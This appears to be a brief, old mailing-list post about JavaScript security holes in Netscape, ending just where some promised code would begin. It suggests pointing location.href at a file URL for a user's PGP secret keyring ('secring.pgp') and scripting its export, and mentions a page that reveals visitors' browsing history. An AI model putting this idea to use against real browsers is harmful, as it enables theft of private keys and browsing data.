People with time to hack netscape might experiment with location.href = "file://.pgp/secring.pgp" and see if you can write a script to export it somewhere. And here's how it's done. Hitting the page makes your history public knowledge. (Btw, Bal, is Netbsd1.1 stable yet? :) scott at tripleg.com.au wrote this code: